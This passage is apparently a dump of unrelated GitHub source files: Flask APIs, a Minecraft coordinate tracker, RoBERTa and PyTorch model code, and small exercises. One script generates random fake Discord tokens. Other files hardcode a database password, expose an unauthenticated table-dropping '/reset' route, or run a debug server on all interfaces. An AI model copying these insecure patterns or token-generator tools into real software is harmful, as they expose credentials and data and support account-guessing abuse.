print(get_vars(sys.argv[2]))\n","repo_name":"GrahamDumpleton-abandoned/mod_wsgi-openshift","sub_path":"apxs.py","file_name":"apxs.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16159196436","text":"import os\r\nimport connexion\r\nfrom flask import Response\r\n\r\nbasedir = os.path.abspath(os.path.dirname(__file__))\r\n\r\nconnex_app = connexion.App(__name__,specification_dir=basedir)\r\n\r\nconnex_app.add_api(\"taxiAPI.yaml\")\r\n\r\nconnex_app.route(\"/health\",methods=[\"GET\"])\r\nconnex_app.route(\"/analysis/provider/{p_id}/analytics/{c_name}\",methods=[\"GET\"])\r\n\r\nconnex_app.route(\"/analysis/provider/{p_id}/stats/{c_name}\", methods=[\"GET\"])\r\nif __name__ == '__main__':\r\n\tconnex_app.run(debug=True, host='0.0.0.0',port=8080,use_reloader=False)\r\n","repo_name":"cmcs200/CN_Project_Group12","sub_path":"analytics_stats/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"6268289801","text":"\"\"\"Testing tokenizers in the nlp.py module.\n\"\"\"\nfrom florabert import config, nlp\n\n\ndef test_dnabert_tokenizer():\n ex_seq = \"AAATCGTCGCGGGCGCTCGCTATATATCGGCTAGCTAACTCGCCCG\"\n tokenizer = nlp.DNABERTTokenizer.from_pretrained(\n config.models / \"dnabert\" / \"tokenizer\", k=6, max_len=512\n )\n tokenized = tokenizer(ex_seq)\n decoded = tokenizer.decode(ex_seq[\"input_ids\"])\n\n assert (\n ex_seq == decoded\n ), f\"Input ({ex_seq}) does not match decoded sequence ({decoded}).\"\n","repo_name":"benlevyx/florabert","sub_path":"tests/test_module/test_tokenizers.py","file_name":"test_tokenizers.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"14487417925","text":"\nfrom django.contrib import admin\nfrom rent_app.models import Boot_directory,Ski_directory,Subsc_directory, Resort_directory,Resort_contact,WeatherModel\nfrom django.contrib.gis.admin import OSMGeoAdmin\n\n#Other admin page URL = 'http://127.0.0.1:8000/rent_admin/ >\n\nclass RentAdminArea(admin.AdminSite):\n site_header = \"Rent Admin Area\"\nrent_admin = RentAdminArea(name='RentAdmin')\n\nclass SubscAdmin(admin.ModelAdmin):\n list_display = ('resort_subsc','subscription','cost_subscr')\nrent_admin.register(Subsc_directory,SubscAdmin)\n\n#<\n\n\nadmin.site.register(Subsc_directory,SubscAdmin)\nclass SkiAdmin(admin.ModelAdmin):\n list_display = ('resort_ski', 'ski_size')\nrent_admin.register(Ski_directory, SkiAdmin)\n\n@admin.register(Boot_directory)\nclass Boot_admin(admin.ModelAdmin):\n list_display = ('boots_size','boots_count','boots_rent_cost')\n\n@admin.register(Ski_directory)\nclass SkiAdmin(admin.ModelAdmin):\n list_display = ('ski_size','ski_count','ski_rent_cost')\n\n@admin.register(Resort_directory)\nclass ResortAdmin(admin.ModelAdmin):\n list_display = ('resort_name','resort_address')\n@admin.register(Resort_contact)\nclass ResortAdmin(OSMGeoAdmin):\n list_display = ('id','contact_phone')\n\n\n@admin.register(WeatherModel)\nclass WeatherAdmin(admin.ModelAdmin):\n list_display = ('resort_address','description','temp')","repo_name":"Algalyq/test_app","sub_path":"mobile_project/rent_app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25864670885","text":"#Imports\nfrom flask import Flask, request\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport json\nfrom sqlalchemy import create_engine\nfrom apis.fetch_visualize_user_data import get_all_charts, get_userid, get_piecharts_data\nfrom apis.fetch_user_recommendations import get_user_recommendations, fetch_user_purchased_products, get_usernames\nfrom apis.TopN import get_topN_products,get_topN_attributes\nfrom apis.monthly_trend import get_category_trend, get_artist_trend, get_product_trend, get_product_names\nfrom flask_cors import CORS, cross_origin\n\n# create sqlalchemy engine and connect to local database\n#Caution: Do not keep special characters in password or db name \n\nengine = create_engine(\"mysql+pymysql://{user}:{pw}@localhost/{db}\"\n .format(user=\"nodejs\",\n pw=\"mysql\", #real password is span@123, but url encoded password is required\n db=\"fashionDB\"))\n\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route('/personalization', methods=['POST'])\ndef user_personalization():\n \"\"\"\n request_format:\n {\n \"func\": string #(one of 'get_all_charts' or 'get_user_recommendations')\n \"user_id\" : int #(currently 1,2,..,30 is valid range)\n }\n\n response:\n if \"func\" == \"get_all_charts\"\n response = {\n \"func\": \"get_all_charts\",\n \"data\": {\n \"image_1\": image path,\n \"image_2\": image path,\n \"image_3\": image path\n }\n }\n if \"func\" == \"get_user_recommendations\\\"\n response = {\n \"func\": \"get_user_recommendations\\\",\n \"data\": [{\n \"product_id\": int,\n \"category\": string,\n \"artist\": string,\n \"theme\": string,\n \"img_path\": string (image path )\n },\n {\n \"product_id\": int,\n \"category\": string,\n \"artist\": string,\n \"theme\": string,\n \"img_path\": string (image path )\n },\n so on... upto 5 products\n ]\n \"\"\"\n content_type = request.headers.get('Content-Type')\n if (content_type == 'application/json'):\n json_dict = request.json\n print(json_dict)\n functionality=json_dict['func']\n #user_id=int(json_dict['user_id'])\n username=json_dict['username']\n user_id=get_userid(username)\n #if functionality=='get_all_charts': \n if functionality=='get_piecharts_data': \n #response_dict={'func':'get_all_charts'}\n #response_dict['data']=get_all_charts(user_id)\n #response=get_all_charts(user_id)\n response=get_piecharts_data(user_id)\n #return json.dumps(response_dict)\n return json.dumps(response)\n elif functionality=='get_user_recommendations':\n #response_dict={'func':'get_user_recommendations'}\n #response_dict['data']=get_user_recommendations(user_id)\n response=get_user_recommendations(user_id)\n #return json.dumps(response_dict)\n return json.dumps(response)\n #return json_dict\n elif functionality=='get_user_products':\n response=fetch_user_purchased_products(user_id)\n return json.dumps(response)\n elif functionality=='get_usernames':\n print(\"getting all usernames\")\n response=get_usernames()\n print(type(response))\n return json.dumps(response)\n else:\n return 'Invalid request!'\n\n else:\n return 'Content-Type not supported!'\n\n# @app.route('/trending', methods=['POST'])\n# def website_trend():\n# \"\"\"\n# request format:\n# {\n# \"func\":\"get_topN_products\" or get_topN_attributes\n# }\n\n# response format:\n# for func=\"get_topN_products\"\n# [{\n# \"product_id\": int,\n# \"category\": string,\n# \"artist\": string,\n# \"theme\": string,\n# \"img_path\": string (image path )\n# },\n# {\n# \"product_id\": int,\n# \"category\": string,\n# \"artist\": string,\n# \"theme\": string,\n# \"img_path\": string (image path )\n# },\n# so on... upto 5 products\n# ]\n\n# for func=\"get_topN_attributes\"\n# {\n# \"category\": [\n# {\n# \"category_id\": int,\n# \"category\": string,\n# \"total_quantity\": int\n# },\n# and so on...\n# ]\n# ,\n# \"artist\": [\n# {\n# \"artist_id\": int,\n# \"artist\": string,\n# \"total_quantity\": int\n# },\n# and so on...\n# ],\n# \"theme\": [\n# {\n# \"theme_id\": int,\n# \"theme\": string,\n# \"total_quantity\": int\n# },\n# and so on...\n# ]\n# }\n\n# \"\"\"\n# content_type = request.headers.get('Content-Type')\n# if (content_type == 'application/json'):\n# json_dict = request.json\n# functionality=json_dict['func']\n# #user_id=int(json_dict['user_id'])\n\n# if functionality=='get_topN_products': \n# #response_dict={'title':'Top Products'}\n# #response_dict['data']=get_topN_products(N=5)\n# response=get_topN_products(N=5)\n# #return json.dumps(response_dict)\n# return json.dumps(response)\n\n# elif functionality=='get_topN_attributes':\n# #response_dict={'func':'get_topN_attributes'}\n# category_array,artist_array,themes_array=get_topN_attributes(N=3)\n# # data_dict={\n# # \"category\":{\"title\":\"Top Categories\",\"data\":category_array},\n# # \"artist\":{\"title\":\"Top Artists\",\"data\":artist_array},\n# # \"theme\": {\"title\":\"Top Artists\",\"data\":themes_array}\n# # }\n# data_dict={\n# \"category\":category_array,\n# \"artist\":artist_array,\n# \"theme\":themes_array\n# }\n# #response_dict['data']=data_dict\n# response=data_dict\n# #return json.dumps(response_dict)\n# return json.dumps(response) \n# else:\n# return 'Invalid request!'\n\n# else:\n# return 'Content-Type not supported!'\n\n@app.route('/trending', methods=['POST'])\ndef website_trend():\n \"\"\"\n request format:\n {\n \"func\":\"get_topN_products\" or get_topN_attributes\n }\n\n response format:\n for func=\"get_topN_products\"\n [{\n \"product_id\": int,\n \"category\": string,\n \"artist\": string,\n \"theme\": string,\n \"img_path\": string (image path )\n },\n {\n \"product_id\": int,\n \"category\": string,\n \"artist\": string,\n \"theme\": string,\n \"img_path\": string (image path )\n },\n so on... upto 5 products\n ]\n\n for func=\"get_topN_attributes\"\n {\n \"category\": [\n {\n \"category_id\": int,\n \"category\": string,\n \"total_quantity\": int\n },\n and so on...\n ]\n ,\n \"artist\": [\n {\n \"artist_id\": int,\n \"artist\": string,\n \"total_quantity\": int\n },\n and so on...\n ],\n \"theme\": [\n {\n \"theme_id\": int,\n \"theme\": string,\n \"total_quantity\": int\n },\n and so on...\n ]\n }\n\n \"\"\"\n content_type = request.headers.get('Content-Type')\n if (content_type == 'application/json'):\n json_dict = request.json\n functionality=json_dict['func']\n #user_id=int(json_dict['user_id'])\n\n if functionality=='get_topN_products': \n #response_dict={'title':'Top Products'}\n #response_dict['data']=get_topN_products(N=5)\n response=get_topN_products(N=5)\n #return json.dumps(response_dict)\n return json.dumps(response)\n\n elif functionality=='get_topN_attributes':\n #response_dict={'func':'get_topN_attributes'}\n category_array,artist_array,themes_array=get_topN_attributes(N=3)\n # data_dict={\n # \"category\":{\"title\":\"Top Categories\",\"data\":category_array},\n # \"artist\":{\"title\":\"Top Artists\",\"data\":artist_array},\n # \"theme\": {\"title\":\"Top Artists\",\"data\":themes_array}\n # }\n data_dict={\n \"category\":category_array,\n \"artist\":artist_array,\n \"theme\":themes_array\n }\n #response_dict['data']=data_dict\n response=data_dict\n #return json.dumps(response_dict)\n return json.dumps(response) \n \n else:\n return 'Invalid request!'\n\n else:\n return 'Content-Type not supported!'\n\n@app.route('/about_project', methods=['GET'])\ndef about_project():\n content_type = request.headers.get('Content-Type')\n if (content_type == 'application/json'):\n img_dir=\"/home/spanidea-168/Documents/SpanIdea_Office_work/Fashion_recommendation_prototype/latex\"\n #img_dir=\"img\"\n image1_path=f\"{img_dir}/mathematical_equation.png\"\n image2_path=f\"{img_dir}/attribute_considered.png\"\n return json.dumps([image1_path,image2_path])\n #img/attribute_considered.jpg\n else:\n return 'Content-Type not supported!' \n\n@app.route('/client')\ndef client():\n ip_addr = request.environ['REMOTE_ADDR']\n return '

Your IP address is:' + ip_addr\n\n\n@app.route('/home', methods=['POST'])\ndef get_usernames_route():\n \"\"\"\n request format:\n {\n \"func\":\"get_usernames\" \n }\n\n response format:\n for func=\"get_usernamess\"\n [{\n \"index\": int,\n \"username\": string,\n },\n {\n \"index\": int,\n \"username\": string,\n },\n so on... all usernames\n ]\n \"\"\"\n content_type = request.headers.get('Content-Type')\n if (content_type == 'application/json'):\n json_dict = request.json\n functionality=json_dict['func']\n #user_id=int(json_dict['user_id'])\n\n if functionality=='get_usernames': \n #response_dict={'title':'Top Products'}\n #response_dict['data']=get_topN_products(N=5)\n response=get_usernames()\n #return json.dumps(response_dict)\n return json.dumps(response)\n else:\n return 'Invalid request!'\n\n else:\n return 'Content-Type not supported!'\n\n\n@app.route('/productData', methods=['POST'])\ndef get_all_product_names():\n # print(\"getting products\")\n \"\"\"\n request format:\n {\n \"func\":\"get_products\" \n }\n\n response format:\n for func=\"get_product_names\"\n [{\n \"index\": int,\n \"product_name\": string,\n \"product_id\": int,\n },\n {\n \"index\": int,\n \"product_name\": string,\n \"product_id\": int,\n },\n so on... all products\n ]\n \"\"\"\n content_type = request.headers.get('Content-Type')\n if (content_type == 'application/json'):\n json_dict = request.json\n functionality=json_dict['func']\n #user_id=int(json_dict['user_id'])\n\n if functionality=='get_products': \n #response_dict={'title':'Top Products'}\n #response_dict['data']=get_topN_products(N=5)\n response=get_product_names()\n #return json.dumps(response_dict)\n return json.dumps(response)\n else:\n return 'Invalid request!'\n\n else:\n return 'Content-Type not supported!'\n\n@app.route('/monthly-trend', methods=['POST'])\ndef monthly_trend():\n content_type = request.headers.get('Content-Type')\n if (content_type == 'application/json'):\n json_dict = request.json\n functionality=json_dict['func']\n if functionality=='get_category_trend':\n category=json_dict['category']\n response=get_category_trend(category)\n return json.dumps(response)\n \n elif functionality=='get_artist_trend':\n artist=json_dict['artist']\n response=get_artist_trend(artist)\n return json.dumps(response)\n elif functionality=='get_product_trend':\n prod_id=json_dict['product_id']\n response=get_product_trend(prod_id)\n return json.dumps(response)\n \n else:\n return 'Content-Type not supported!'\n\n\n","repo_name":"ps428/Fashion-Recommendation-Website","sub_path":"apis/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":13262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12302817998","text":"\nr\"\"\"undocumented\n这个页面的代码很大程度上参考(复制粘贴)了https://github.com/huggingface/pytorch-pretrained-BERT的代码, 如果你发现该代码对你\n 有用,也请引用一下他们。\n\"\"\"\n\n__all__ = [\n 'RobertaModel'\n]\n\nimport torch\nimport torch.nn as nn\n\nfrom .bert import BertEmbeddings, BertModel, BertConfig\nfrom fastNLP.io.file_utils import _get_file_name_base_on_postfix\nfrom ...io.file_utils import _get_roberta_dir\nfrom ...core import logger\n\nPRETRAINED_ROBERTA_POSITIONAL_EMBEDDINGS_SIZES = {\n \"roberta-base\": 512,\n \"roberta-large\": 512,\n \"roberta-large-mnli\": 512,\n \"distilroberta-base\": 512,\n \"roberta-base-openai-detector\": 512,\n \"roberta-large-openai-detector\": 512,\n}\n\n\nclass RobertaEmbeddings(BertEmbeddings):\n \"\"\"\n Same as BertEmbeddings with a tiny tweak for positional embeddings indexing.\n \"\"\"\n\n def __init__(self, config):\n super().__init__(config)\n self.padding_idx = 1\n self.word_embeddings = nn.Embedding(config.vocab_size, config.hidden_size, padding_idx=self.padding_idx)\n self.position_embeddings = nn.Embedding(\n config.max_position_embeddings, config.hidden_size, padding_idx=self.padding_idx\n )\n\n def forward(self, input_ids, token_type_ids, words_embeddings=None):\n position_ids = self.create_position_ids_from_input_ids(input_ids)\n\n return super().forward(\n input_ids, token_type_ids=token_type_ids, position_ids=position_ids, words_embeddings=words_embeddings\n )\n\n def create_position_ids_from_input_ids(self, x):\n \"\"\" Replace non-padding symbols with their position numbers. Position numbers begin at\n padding_idx+1. Padding symbols are ignored. This is modified from fairseq's\n `utils.make_positions`.\n\n :param torch.Tensor x:\n :return torch.Tensor:\n \"\"\"\n mask = x.ne(self.padding_idx).long()\n incremental_indicies = torch.cumsum(mask, dim=1) * mask\n return incremental_indicies + self.padding_idx\n\n\nclass RobertaModel(BertModel):\n r\"\"\"\n undocumented\n \"\"\"\n\n def __init__(self, config):\n super().__init__(config)\n\n self.embeddings = RobertaEmbeddings(config)\n self.apply(self.init_bert_weights)\n\n @classmethod\n def from_pretrained(cls, model_dir_or_name, *inputs, **kwargs):\n state_dict = kwargs.get('state_dict', None)\n kwargs.pop('state_dict', None)\n kwargs.pop('cache_dir', None)\n kwargs.pop('from_tf', None)\n\n # get model dir from name or dir\n pretrained_model_dir = _get_roberta_dir(model_dir_or_name)\n\n # Load config\n config_file = _get_file_name_base_on_postfix(pretrained_model_dir, 'config.json')\n config = BertConfig.from_json_file(config_file)\n\n # Load model\n if state_dict is None:\n weights_path = _get_file_name_base_on_postfix(pretrained_model_dir, '.bin')\n state_dict = torch.load(weights_path, map_location='cpu')\n else:\n logger.error(f'Cannot load parameters through `state_dict` variable.')\n raise RuntimeError(f'Cannot load parameters through `state_dict` variable.')\n\n # Instantiate model.\n model = cls(config, *inputs, **kwargs)\n\n missing_keys = []\n unexpected_keys = []\n error_msgs = []\n\n # Convert old format to new format if needed from a PyTorch state_dict\n old_keys = []\n new_keys = []\n for key in state_dict.keys():\n new_key = None\n if \"gamma\" in key:\n new_key = key.replace(\"gamma\", \"weight\")\n if \"beta\" in key:\n new_key = key.replace(\"beta\", \"bias\")\n if new_key:\n old_keys.append(key)\n new_keys.append(new_key)\n for old_key, new_key in zip(old_keys, new_keys):\n state_dict[new_key] = state_dict.pop(old_key)\n\n # copy state_dict so _load_from_state_dict can modify it\n metadata = getattr(state_dict, \"_metadata\", None)\n state_dict = state_dict.copy()\n if metadata is not None:\n state_dict._metadata = metadata\n\n # PyTorch's `_load_from_state_dict` does not copy parameters in a module's descendants\n # so we need to apply the function recursively.\n def load(module: nn.Module, prefix=\"\"):\n local_metadata = {} if metadata is None else metadata.get(prefix[:-1], {})\n module._load_from_state_dict(\n state_dict, prefix, local_metadata, True, missing_keys, unexpected_keys, error_msgs,\n )\n for name, child in module._modules.items():\n if child is not None:\n load(child, prefix + name + \".\")\n\n # Make sure we are able to load base models as well as derived models (with heads)\n start_prefix = \"\"\n model_to_load = model\n if not hasattr(model, 'roberta') and any(\n s.startswith('roberta') for s in state_dict.keys()\n ):\n start_prefix = 'roberta.'\n if hasattr(model, 'roberta') and not any(\n s.startswith('roberta') for s in state_dict.keys()\n ):\n model_to_load = getattr(model, 'roberta')\n\n load(model_to_load, prefix=start_prefix)\n\n if model.__class__.__name__ != model_to_load.__class__.__name__:\n base_model_state_dict = model_to_load.state_dict().keys()\n head_model_state_dict_without_base_prefix = [\n key.split('roberta.')[-1] for key in model.state_dict().keys()\n ]\n\n missing_keys.extend(head_model_state_dict_without_base_prefix - base_model_state_dict)\n\n if len(missing_keys) > 0:\n logger.info(\n \"Weights of {} not initialized from pretrained model: {}\".format(\n model.__class__.__name__, missing_keys\n )\n )\n if len(unexpected_keys) > 0:\n logger.info(\n \"Weights from pretrained model not used in {}: {}\".format(\n model.__class__.__name__, unexpected_keys\n )\n )\n if len(error_msgs) > 0:\n raise RuntimeError(\n \"Error(s) in loading state_dict for {}:\\n\\t{}\".format(\n model.__class__.__name__, \"\\n\\t\".join(error_msgs)\n )\n )\n\n # Set model in evaluation mode to desactivate DropOut modules by default\n model.eval()\n\n logger.info(f\"Load pre-trained RoBERTa parameters from file {weights_path}.\")\n\n return model\n\n\n","repo_name":"sustcsonglin/TN-PCFG","sub_path":"fastNLP/modules/encoder/roberta.py","file_name":"roberta.py","file_ext":"py","file_size_in_byte":6613,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"32"} +{"seq_id":"14508693233","text":"#!/usr/bin/python3\n\"\"\" text_indentation function \"\"\"\n\n\ndef text_indentation(text):\n \"\"\"\n # This function prints a text with 2 new lines\n after each of these characters: '.', '?' and ':'.\n\n Args:\n\n text (str) = The text.\n\n - ``text`` must be a string,\n otherwise raise a ``TypeError`` exception.\n \"\"\"\n\n initial = final = printed = 0\n\n if type(text) != str:\n raise TypeError(\"text must be a string\")\n\n while initial < len(text):\n if text[initial] != \" \":\n break\n\n initial += 1\n\n final = initial\n\n for final in range(len(text)):\n\n printed = 0\n\n if text[final] == '.' or text[final] == '?' or text[final] == ':':\n\n final += 1\n print(text[initial:final])\n print()\n\n while final < len(text):\n\n if text[final] != \" \":\n break\n final += 1\n\n initial = final\n printed = 1\n\n if printed == 0:\n print(text[initial:(final + 1)], end=\"\")\n","repo_name":"SergioO21/holbertonschool-higher_level_programming","sub_path":"0x07-python-test_driven_development/5-text_indentation.py","file_name":"5-text_indentation.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72436664410","text":"import csv\nimport numpy as np\n\ndef save_matrix(csvfile, matrix, labels, row, col):\n '''将矩阵保存成csv文件'''\n\n csv = open(csvfile, \"w\")\n\n # 写头\n csv.write(\"\")\n for c in col: csv.write(\",%s\"% c)\n csv.write(\",type\\n\")\n\n\n for ir, im, il in zip(row, matrix, labels):\n csv.write(\"%s,\" % ir)\n for iim in im:\n csv.write(\"%f,\" % iim)\n\n csv.write(\"%s\\n\"% il)\n\ndef load_matrix(csvfile):\n row, col, matrix, label = [], [], [], []\n for i, line in enumerate(csv.reader(open(csvfile))):\n if i == 0: \n col = line[1:-1]\n else:\n row.append(line[0])\n matrix.append(line[1:-1])\n label.append(line[-1])\n\n return np.array(matrix, dtype=float), np.array(label), np.array(row), np.array(col)\n","repo_name":"lemene/mbio","sub_path":"mbio/io/csv.py","file_name":"csv.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21349796317","text":"import os, time, random, sys\r\nfrom colorium import *\r\n\r\n\r\nuzunluk = 58\r\nchars = \"-abcdefghijklmnopq_rstu.vwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789\"\r\n\r\n\r\ndef gen():\r\n os.system(\"clear\")\r\n while True:\r\n print(\"N\", end=\"\")\r\n for i in range(uzunluk):\r\n token = random.choice(chars)\r\n print(token, end=\"\")\r\n \r\n print(\"\")\r\n time.sleep(0.5)\r\n\r\n\r\n\r\n\r\n\r\ndef genwin():\r\n os.system(\"cls\")\r\n while True:\r\n print(\"N\", end=\"\")\r\n for i in range(uzunluk):\r\n token = random.choice(chars)\r\n print(token, end=\"\")\r\n \r\n print(\"\")\r\n time.sleep(0.5)\r\n\r\n\r\n\r\noscheck = os.name\r\n\r\nif oscheck == \"nt\":\r\n genwin()\r\nelif oscheck == \"posix\":\r\n gen()","repo_name":"RiseToDev751/DiscordGeneratorTools","sub_path":"token.py","file_name":"token.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"32"} +{"seq_id":"70007143771","text":"import cv2 as cv\nimport numpy as np\nimport random\n\n# define a video capture object \nvid = cv.VideoCapture(0) \n\n#colors written in BGR format\nred = (0, 0, 255)\norange = (0, 128, 255)\nyellow = (0, 255, 255)\npurple = (255, 0, 128)\nblue = (255, 0, 0)\ngreen = (0, 255, 0)\n\n\nwhile(True): \n\n # Capture the video frame \n # by frame \n ret, frame = vid.read()\n\n left_corner = (random.randint(0, 100), random.randint(0, 100))\n right_corner = (random.randint(120, 600), random.randint(130, 600))\n\n frame = cv.rectangle(frame, left_corner, right_corner, green, 10)\n\n # Display the resulting frame \n cv.imshow('Frames', frame)\n\n # the 'q' button is set as the \n # quitting button you may use any \n # desired button of your choice \n if cv.waitKey(1) & 0xFF == ord('q'): \n break\n\n# After the loop release the cap object \nvid.release() \n# Destroy all the windows \ncv.destroyAllWindows() \n\n","repo_name":"m-zetina/openCV-work","sub_path":"openCVsample.py","file_name":"openCVsample.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23984904183","text":"# 객체 출력1 : 피클파일에 저장하기\n## pickle (import 선언) : 딕셔너리/리스트와 같은 내용을 파일에 그대로 저장/불러올 수 있다.\n## dump() : 객체를 pickle모듈로 압축한다.\nimport pickle\n\n# 저장하고자 하는 딕셔너리를 입력한다.\ngameOption = {'sound' : 8,'videoQuality' : 'high','money' : 1000000, 'weaponlist' : ['gun','missile','knife']}\n\n# 파일을 연다. (해당 예시에서는 이진파일을 호출하였으나, 어느 확장자로 하더라도 피클이 가능하다)\n# 피클파일의 모드를 지정할 때에는 반드시 뒤에 'b(바이너리)'를 입력한다(wb, rb ... )\nfile = open(\"test1.p\",'wb')\n\n#딕셔너리를 피클파일에 저장한다.\npickle.dump(gameOption,file)\n\n#파일을 닫는다.\nfile.close()\n","repo_name":"ysjin0715/python-practice","sub_path":"chapter11/pickle1(dump).py","file_name":"pickle1(dump).py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41455461570","text":"import os\nfrom flask import Flask, render_template, request, url_for, flash, redirect\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy.exc import IntegrityError\nfrom datetime import datetime\n\n# TODO add dimensions\n# TODO add sessions / user identification\n# TODO add admin accounts\n# TODO add possibility to show/hide coordinates\n# TODO display current server seed\n# !BUG entry will go in even if one entry of coordinates is empty:\n# !BUG str will result as \"int int '' \"\n# !BUG same thing happens if name is empty\n\n#? maybe keep single coordinate (y_coord) omission a feature?\n\n# get working directory\n_cwd = os.getcwd()\n\n# declaring variables used to config Flask app instance\nSECRET_KEY = os.urandom(24).hex()\nWTF_CSRF_SECRET_KEY = 'other-key'\nSQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(_cwd, 'coords.db')\nSQALCHEMY_ECHO = True\n\n# specify folder paths for templates and static files\napp = Flask(__name__, template_folder='templates', static_folder='static')\napp.debug = True\n\napp.config.from_object(__name__)\napp.config['SECRET_KEY'] = SECRET_KEY\napp.config['SQLALCHEMY_DATABASE_URI'] = SQLALCHEMY_DATABASE_URI\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\n\nclass Coordinate:\n def __init__(self, x, y, z):\n self.x = x\n self.y = y\n self.z = z\n\n def returnAsString(self):\n if (self.x != None and self.y != None and self.z != None ):\n return self.x + ' ' + self.y + ' ' + self.z\n\n\n# passing an object when declaring a model simply means that\n# the created class is a sub-class of the class between parenthesis\nclass Coordinates(db.Model):\n __tablename__ = 'coords_table'\n\n id = db.Column(db.Integer, primary_key=True)\n date = db.Column(db.Date)\n dimension = db.Column(db.String(100), nullable=False)\n coords = db.Column(db.String(100), nullable=False)\n description = db.Column(db.String(2048), nullable=False, unique=True)\n\n # allows you to give each object \n # a string representation to recognize it for debugging purposes.\n def __repr__(self):\n return f\"Coordinates : {self.coords}, Description: {self.description}\"\n\n\nwith app.app_context():\n db.create_all()\n\n\n@app.route('/reset')\ndef resetDB():\n db.drop_all()\n\n return redirect(url_for('index')) \n\n@app.route('/login')\ndef login():\n return render_template('login.html')\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/enter_coordinates', methods = ['GET', 'POST'])\ndef showForm():\n return render_template('create.html')\n\n \n@app.route('/submit_coordinates', methods=['GET','POST'])\ndef submitForm():\n if request.method == \"POST\":\n\n loc_name = request.form.get('coords-info')\n \n x_coord = request.form.get('coord-x')\n y_coord = request.form.get('coord-y')\n z_coord = request.form.get('coord-z')\n\n dim = request.form.get('dim')\n\n # check if coords have been inserted, skip if any of them is not correct\n coords = Coordinate(x_coord, y_coord, z_coord)\n curr_date = datetime.now()\n if(coords.returnAsString().isspace() == False and loc_name.isspace() == False):\n entry = Coordinates(\n coords=str(coords.returnAsString()), \n date=curr_date, \n dimension=dim, \n description=str(loc_name))\n db.session.add(entry)\n\n try:\n db.session.commit()\n except IntegrityError:\n print(\"Error!\")\n flash(\"Entry failed! It probably exists in database already!\", 'error')\n db.session.rollback()\n else:\n print(\"Error!\")\n flash(\"Entry not inserted! Check if values are not null!\", 'error')\n\n return render_template('create.html')\n\n# TODO check if table exists before getting coord_list\n@app.route('/coord-list/', methods = ['GET', 'POST'])\ndef showList():\n dimension = \"All\"\n if(request.method == \"POST\"):\n dimension = request.form.get('dim')\n\n if (dimension != \"All\"):\n coord_list = Coordinates.query.filter_by(dimension = dimension)\n else:\n coord_list = Coordinates.query.all()\n\n\n if (not coord_list):\n flash('Empty list!', 'error')\n\n return render_template('list.html', coordinate_list = coord_list, dim = dimension) \n\n@app.route('/coord-list/delete/', methods=['GET', 'POST'])\ndef deleteEntry():\n if request.method == \"POST\":\n ID_to_remove = request.form.get('clicked_btn')\n Coordinates.query.filter_by(id=ID_to_remove).delete()\n \n try:\n db.session.commit()\n except IntegrityError:\n print(\"Error!\")\n flash(\"Deletion failed!\")\n db.session.rollback()\n else:\n print(\"Error!\")\n flash(\"Deletion failed!\")\n\n return redirect(url_for(('showList')))\n\nif __name__ == '__main__':\n app.run()","repo_name":"Grocery4/mc-coordinates-tracker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16336400184","text":"import random\n\nimport torch\n\nimport torch.nn as nn\nimport torch.nn.init\nimport torch.nn.functional as F\n\nfrom torch.autograd import Variable\n\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom layers import ScaledEmbedding, ZeroEmbedding\n\nclass HybridContainer(nn.Module):\n\n def __init__(self,\n latent_module,\n user_module=None,\n context_module=None,\n item_module=None):\n\n super(HybridContainer, self).__init__()\n\n self.latent = latent_module\n self.user = user_module\n self.context = context_module\n self.item = item_module\n\n def forward(self, user_ids,\n item_ids,\n user_features=None,\n context_features=None,\n item_features=None):\n\n user_representation, user_bias = self.latent.user_representation(user_ids)\n item_representation, item_bias = self.latent.item_representation(item_ids)\n\n if self.user is not None:\n user_representation += self.user(user_features)\n if self.context is not None:\n user_representation += self.context(context_features)\n if self.item is not None:\n item_representation += self.item(item_features)\n\n dot = (user_representation * item_representation).sum(1)\n\n return dot + user_bias + item_bias\n\nclass FeatureNet(nn.Module):\n\n def __init__(self, input_dim, output_dim, bias=False, nonlinearity='tanh'):\n\n super(FeatureNet, self).__init__()\n\n if nonlinearity == 'tanh':\n self.nonlinearity = F.tanh\n elif nonlinearity == 'relu':\n self.nonlinearity = F.relu\n elif nonlinearity == 'sigmoid':\n self.nonlinearity = F.sigmoid\n elif nonlinearity == 'linear':\n self.nonlinearity = lambda x: x\n else:\n raise ValueError('Nonlineariy must be one of '\n '(tanh, relu, sigmoid, linear)')\n\n self.input_dim = input_dim\n self.output_dim = 